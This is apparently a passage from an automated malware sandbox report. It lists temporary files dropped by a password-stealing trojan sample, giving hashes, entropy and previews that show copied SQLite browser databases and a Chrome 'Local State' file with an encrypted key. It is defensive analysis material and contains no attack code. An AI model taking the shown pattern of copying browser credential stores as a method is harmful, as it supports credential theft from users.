                                                                                                                    SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                    MD5:72A43D390E478BA9664F03951692D109
                                                                                                                    SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                    SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                    SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                    Malicious:false
                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                    Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                    C:\Users\user\AppData\Local\Temp\tmp2A55.tmp
                                                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):87165
                                                                                                                    Entropy (8bit):6.102565506017432
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:S9sfGRcZdJiXrXafIyYOetKdapZsyTwL3cDGOLN0nTwY/A3iuR+:SsfFcbXafIB0u1GOJmA3iuR+
                                                                                                                    MD5:CC02ABB348037609ED09EC9157D55234
                                                                                                                    SHA1:32411A59960ECF4D7434232194A5B3DB55817647
                                                                                                                    SHA-256:62E0236494260F5C9FFF1C4DBF1A57C66B28A5ABE1ACF21B26D08235C735C7D8
                                                                                                                    SHA-512:AC95705ED369D82B65200354E10875F6AD5EBC4E0F9FFC61AE6C45C32410B6F55D4C47B219BA4722B6E15C34AC57F91270581DB0A391711D70AF376170DE2A35
                                                                                                                    Malicious:false
                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                    Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601478090199719e+12,"network":1.601453434e+12,"ticks":826153657.0,"uncertainty":4457158.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                    C:\Users\user\AppData\Local\Temp\tmp2A56.tmp
                                                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):73728
                                                                                                                    Entropy (8bit):1.1874185457069584
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                    MD5:72A43D390E478BA9664F03951692D109
                                                                                                                    SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                    SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                    SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                    Malicious:false
                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                    Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                    C:\Users\user\AppData\Local\Temp\tmp2A57.tmp
                                                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):87165
                                                                                                                    Entropy (8bit):6.102565506017432
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:S9sfGRcZdJiXrXafIyYOetKdapZsyTwL3cDGOLN0nTwY/A3iuR+:SsfFcbXafIB0u1GOJmA3iuR+
                                                                                                                    MD5:CC02ABB348037609ED09EC9157D55234
                                                                                                                    SHA1:32411A59960ECF4D7434232194A5B3DB55817647
                                                                                                                    SHA-256:62E0236494260F5C9FFF1C4DBF1A57C66B28A5ABE1ACF21B26D08235C735C7D8
                                                                                                                    SHA-512:AC95705ED369D82B65200354E10875F6AD5EBC4E0F9FFC61AE6C45C32410B6F55D4C47B219BA4722B6E15C34AC57F91270581DB0A391711D70AF376170DE2A35
                                                                                                                    Malicious:false
                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                    Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601478090199719e+12,"network":1.601453434e+12,"ticks":826153657.0,"uncertainty":4457158.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                    C:\Users\user\AppData\Local\Temp\tmp2A87.tmp
                                                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):73728
                                                                                                                    Entropy (8bit):1.1874185457069584
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                    MD5:72A43D390E478BA9664F03951692D109
                                                                                                                    SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                    SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                    SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                    Malicious:false
                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                    Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                    C:\Users\user\AppData\Local\Temp\tmp2A88.tmp
                                                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):87165
                                                                                                                    Entropy (8bit):6.102565506017432
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:S9sfGRcZdJiXrXafIyYOetKdapZsyTwL3cDGOLN0nTwY/A3iuR+:SsfFcbXafIB0u1GOJmA3iuR+
                                                                                                                    MD5:CC02ABB348037609ED09EC9157D55234
                                                                                                                    SHA1:32411A59960ECF4D7434232194A5B3DB55817647
                                                                                                                    SHA-256:62E0236494260F5C9FFF1C4DBF1A57C66B28A5ABE1ACF21B26D08235C735C7D8
                                                                                                                    SHA-512:AC95705ED369D82B65200354E10875F6AD5EBC4E0F9FFC61AE6C45C32410B6F55D4C47B219BA4722B6E15C34AC57F91270581DB0A391711D70AF376170DE2A35
                                                                                                                    Malicious:false
                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                    Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601478090199719e+12,"network":1.601453434e+12,"ticks":826153657.0,"uncertainty":4457158.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                    C:\Users\user\AppData\Local\Temp\tmp2A89.tmp
                                                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):73728
                                                                                                                    Entropy (8bit):1.1874185457069584
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                    MD5:72A43D390E478BA9664F03951692D109
                                                                                                                    SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                    SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                    SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                    Malicious:false
                                                                                                                    Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                    C:\Users\user\AppData\Local\Temp\tmp2A8A.tmp
                                                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):87165
                                                                                                                    Entropy (8bit):6.102565506017432
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:S9sfGRcZdJiXrXafIyYOetKdapZsyTwL3cDGOLN0nTwY/A3iuR+:SsfFcbXafIB0u1GOJmA3iuR+
                                                                                                                    MD5:CC02ABB348037609ED09EC9157D55234
                                                                                                                    SHA1:32411A59960ECF4D7434232194A5B3DB55817647
                                                                                                                    SHA-256:62E0236494260F5C9FFF1C4DBF1A57C66B28A5ABE1ACF21B26D08235C735C7D8
                                                                                                                    SHA-512:AC95705ED369D82B65200354E10875F6AD5EBC4E0F9FFC61AE6C45C32410B6F55D4C47B219BA4722B6E15C34AC57F91270581DB0A391711D70AF376170DE2A35
                                                                                                                    Malicious:false
                                                                                                                    Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601478090199719e+12,"network":1.601453434e+12,"ticks":826153657.0,"uncertainty":4457158.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                    C:\Users\user\AppData\Local\Temp\tmp2A8B.tmp
                                                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):73728
                                                                                                                    Entropy (8bit):1.1874185457069584
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                    MD5:72A43D390E478BA9664F03951692D109
                                                                                                                    SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                    SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                    SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                    Malicious:false
                                                                                                                    Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                    C:\Users\user\AppData\Local\Temp\tmp76A9.tmp
                                                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):87165
                                                                                                                    Entropy (8bit):6.102565506017432
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:S9sfGRcZdJiXrXafIyYOetKdapZsyTwL3cDGOLN0nTwY/A3iuR+:SsfFcbXafIB0u1GOJmA3iuR+
                                                                                                                    MD5:CC02ABB348037609ED09EC9157D55234
                                                                                                                    SHA1:32411A59960ECF4D7434232194A5B3DB55817647
                                                                                                                    SHA-256:62E0236494260F5C9FFF1C4DBF1A57C66B28A5ABE1ACF21B26D08235C735C7D8
                                                                                                                    SHA-512:AC95705ED369D82B65200354E10875F6AD5EBC4E0F9FFC61AE6C45C32410B6F55D4C47B219BA4722B6E15C34AC57F91270581DB0A391711D70AF376170DE2A35
                                                                                                                    Malicious:false
                                                                                                                    Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601478090199719e+12,"network":1.601453434e+12,"ticks":826153657.0,"uncertainty":4457158.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                    C:\Users\user\AppData\Local\Temp\tmp76D9.tmp
                                                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):40960
                                                                                                                    Entropy (8bit):0.792852251086831
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                    MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                    SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                    SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                    SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                    Malicious:false
                                                                                                                    Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                    C:\Users\user\AppData\Local\Temp\tmpD19C.tmp
                                                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):87165
                                                                                                                    Entropy (8bit):6.102565506017432
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:S9sfGRcZdJiXrXafIyYOetKdapZsyTwL3cDGOLN0nTwY/A3iuR+:SsfFcbXafIB0u1GOJmA3iuR+
                                                                                                                    MD5:CC02ABB348037609ED09EC9157D55234
                                                                                                                    SHA1:32411A59960ECF4D7434232194A5B3DB55817647
                                                                                                                    SHA-256:62E0236494260F5C9FFF1C4DBF1A57C66B28A5ABE1ACF21B26D08235C735C7D8
                                                                                                                    SHA-512:AC95705ED369D82B65200354E10875F6AD5EBC4E0F9FFC61AE6C45C32410B6F55D4C47B219BA4722B6E15C34AC57F91270581DB0A391711D70AF376170DE2A35
                                                                                                                    Malicious:false
                                                                                                                    Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601478090199719e+12,"network":1.601453434e+12,"ticks":826153657.0,"uncertainty":4457158.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                    C:\Users\user\AppData\Local\Temp\tmpD19D.tmp
                                                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):40960
                                                                                                                    Entropy (8bit):0.792852251086831
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                    MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                    SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                    SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                    SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                    Malicious:false
                                                                                                                    Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                    C:\Users\user\AppData\Local\Temp\tmpD19E.tmp
                                                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):87165
                                                                                                                    Entropy (8bit):6.102565506017432
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:S9sfGRcZdJiXrXafIyYOetKdapZsyTwL3cDGOLN0nTwY/A3iuR+:SsfFcbXafIB0u1GOJmA3iuR+
                                                                                                                    MD5:CC02ABB348037609ED09EC9157D55234
                                                                                                                    SHA1:32411A59960ECF4D7434232194A5B3DB55817647
                                                                                                                    SHA-256:62E0236494260F5C9FFF1C4DBF1A57C66B28A5ABE1ACF21B26D08235C735C7D8
                                                                                                                    SHA-512:AC95705ED369D82B65200354E10875F6AD5EBC4E0F9FFC61AE6C45C32410B6F55D4C47B219BA4722B6E15C34AC57F91270581DB0A391711D70AF376170DE2A35
                                                                                                                    Malicious:false
                                                                                                                    Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601478090199719e+12,"network":1.601453434e+12,"ticks":826153657.0,"uncertainty":4457158.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                    C:\Users\user\AppData\Local\Temp\tmpD19F.tmp
                                                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):40960
                                                                                                                    Entropy (8bit):0.792852251086831
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                    MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                    SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                    SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                    SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                    Malicious:false
                                                                                                                    Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                    C:\Users\user\AppData\Local\Temp\tmpFE00.tmp
                                                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):87165
                                                                                                                    Entropy (8bit):6.102565506017432
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:1536:S9sfGRcZdJiXrXafIyYOetKdapZsyTwL3cDGOLN0nTwY/A3iuR+:SsfFcbXafIB0u1GOJmA3iuR+
                                                                                                                    MD5:CC02ABB348037609ED09EC9157D55234
                                                                                                                    SHA1:32411A59960ECF4D7434232194A5B3DB55817647
                                                                                                                    SHA-256:62E0236494260F5C9FFF1C4DBF1A57C66B28A5ABE1ACF21B26D08235C735C7D8
                                                                                                                    SHA-512:AC95705ED369D82B65200354E10875F6AD5EBC4E0F9FFC61AE6C45C32410B6F55D4C47B219BA4722B6E15C34AC57F91270581DB0A391711D70AF376170DE2A35
                                                                                                                    Malicious:false
                                                                                                                    Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.601478090199719e+12,"network":1.601453434e+12,"ticks":826153657.0,"uncertainty":4457158.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                    C:\Users\user\AppData\Local\Temp\tmpFE10.tmp
                                                                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):20480
                                                                                                                    Entropy (8bit):0.6970840431455908
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                                                                                    MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                                                                                    SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
